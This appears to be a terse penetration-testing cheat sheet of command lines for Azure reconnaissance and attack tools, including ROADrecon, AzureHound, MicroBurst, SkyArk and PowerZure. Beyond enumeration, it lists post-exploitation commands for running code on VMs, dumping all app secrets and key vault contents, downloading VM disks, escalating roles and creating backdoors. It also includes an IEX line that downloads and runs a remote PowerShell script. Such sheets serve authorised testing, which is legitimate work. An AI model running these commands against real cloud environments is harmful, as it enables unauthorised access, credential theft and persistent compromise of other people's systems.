>pipenv shell
>roadrecon auth [-h] [-u USERNAME] [-p PASSWORD] [-t TENANT] [-c CLIENT] [--as-app] [--device-code] [--access-token ACCESS_TOKEN] [--refresh-token REFRESH_TOKEN] [-f TOKENFILE] [--tokens-stdout]
>roadrecon gather [-h] [-d DATABASE] [-f TOKENFILE] [--tokens-stdin] [--mfa]
>roadrecon auth -u test@<TENANT NAME>.onmicrosoft.com -p <PASSWORD>
>roadrecon gather
>roadrecon gui
https://github.com/Azure/Stormspotter
https://github.com/BloodHoundAD/AzureHound
>. C:\Tools\AzureHound\AzureHound.ps1
>Invoke-AzureHound -Verbose
GUI
bolt://localhost:7687
Username: neo4j
Password: BloodHound
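Azucar automatically gathers a variety of configuration data and analyzes all data related to a particular subscription
Use an account with at least read permission on the assets you want to access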
git clone https://github.com/nccgroup/azucar.git
PS> Get-ChildItem -Recurse c:\Azucar_V10 | Unblock-File
PS> .\Azucar.ps1 -AuthMode UseCachedCredentials -Verbose -WriteLog -Debug -ExportTo PRINT
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
PS> .\Azucar.ps1 -ExportTo CSV,JSON,XML,EXCEL -AuthMode Certificate_Credentials -Certificate C:\AzucarTest\server.pfx -CertFilePassword MySuperP@ssw0rd! -ApplicationId 00000000-0000-0000-0000-000000000000 -TenantID 00000000-0000-0000-0000-000000000000
Resolve the TenantID for a specific username
PS> .\Azucar.ps1 -ResolveTenantUserName [email protected]
Azurite Explorer and Azurite Visualizer: enumeration and reconnaissance activities in the Microsoft Azure cloud
>git clone https://github.com/mwrlabs/Azurite.git
>git clone https://github.com/FSecureLABS/Azurite
>git submodule init
>git submodule update
PS> Import-Module AzureRM
PS> Import-Module AzuriteExplorer.ps1
PS> Review-AzureRmSubscription
PS> Review-CustomAzureRmSubscription
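Includes functions and scripts that support Azure service discovery, weak configuration auditing, and post-exploitation actions (such as credential dumping)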
>git clone https://github.com/NetSPI/MicroBurst
PS C:> Import-Module .\MicroBurst.psm1
PS C:> Import-Module .\Get-AzureDomainInfo.ps1
PS C:> Get-AzureDomainInfo -folder MicroBurst -Verbose
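Discovers the most privileged users in the scanned Azure environment, including Azure shadow admins
Requirements:
Read-only permission on the Azure directory
Read-only permission on the subscription
Requires the AZ and AzureAD modules or administrator privileges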
$ git clone https://github.com/cyberark/SkyArk
$ powershell -ExecutionPolicy Bypass -NoProfile
PS C> Import-Module .\SkyArk.ps1 -force
PS C> Start-AzureStealth
or in the Cloud Console
PS C> IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cyberark/SkyArk/master/AzureStealth/AzureStealth.ps1')
PS C> Scan-AzureAdmins
>git clone https://github.com/hausec/PowerZure
>ipmo .\PowerZure
>Set-Subscription -Id [idgoeshere]
Reader
>Get-Runbook, Get-AllUsers, Get-Apps, Get-Resources, Get-WebApps, Get-WebAppDetails
Contributor
>Execute-Command -OS Windows -VM Win10Test -ResourceGroup Test-RG -Command "whoami"
>Execute-MSBuild -VM Win10Test -ResourceGroup Test-RG -File "build.xml"
>Get-AllSecrets # AllAppSecrets, AllKeyVaultContents
>Get-AvailableVMDisks, Get-VMDisk # Download a virtual machine's disk
Owner
>Set-Role -Role Contributor -User [email protected] -Resource Win10VMTest
Administrator
>Create-Backdoor, Execute-Backdoor